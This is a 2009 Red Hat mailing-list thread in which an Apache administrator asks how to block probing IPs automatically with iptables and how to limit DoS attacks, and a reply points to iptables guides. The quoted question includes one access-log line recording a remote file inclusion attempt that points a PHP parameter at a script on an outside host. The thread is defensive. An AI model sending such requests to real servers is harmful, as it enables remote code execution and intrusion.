blocking ips with iptables accessing invalid URL

Tatu Salin tatusalin at hotmail.com
Wed Jul 8 10:25:03 UTC 2009 

I would suggest you to read https://help.ubuntu.com/community/IptablesHowTo . There is good explanation about using burst limitation and if you are more eagern to read more information about how to prevent dos attacks there is also good information defined on http://www.onlamp.com/pub/a/bsd/2004/06/24/anti_dos.html . Please check if these would be something help to you. 

__________________________
Tatu 
************************************************************************************************************************************************************************
“Paranoia will get you through times of no enemies better than enemies will get you through times of no paranoia”


~ Pete Granger






> Date: Wed, 8 Jul 2009 09:58:51 +0200
> From: esggrupos at gmail.com
> To: redhat-list at redhat.com
> Subject: blocking ips with iptables accessing invalid URL
> 
> Hi all,
> I´m having a problem with an Apache web server.
> 
> I get a lot of access ot this kind:
> 
> 
> x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET
> //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt???
> HTTP/1.1" 404 1015 "-" "Mozilla/5.0"
> 
> where x.x.x.x is the ip of the client, I suposse this ip is trying to find a
> security hole in my system, so what I do manually is this:
> 
> iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP
> 
> I want to do this automatically. I´m thinking to use logwatch but I´m not
> sure how to do it. (I´m testing but for the moment I haven´t found the
> solution)
> 
> anybody knows another way to do what I want?
> 
> By the way, I´m interesting to limit the connections to my webserver using
> iptables with limit module and busrt argument. What do you think about it?
> is a good solution or I´m on the wrong way? Do you know how to prevent DOS
> attacks?
> 
> Thanks in advance
> 
> ESG
> -- 
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=subscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

_________________________________________________________________
Windows puhelimella saat enemmän vastinetta rahoillesi.
http://www.windowsmobile.fi

More information about the redhat-list mailing list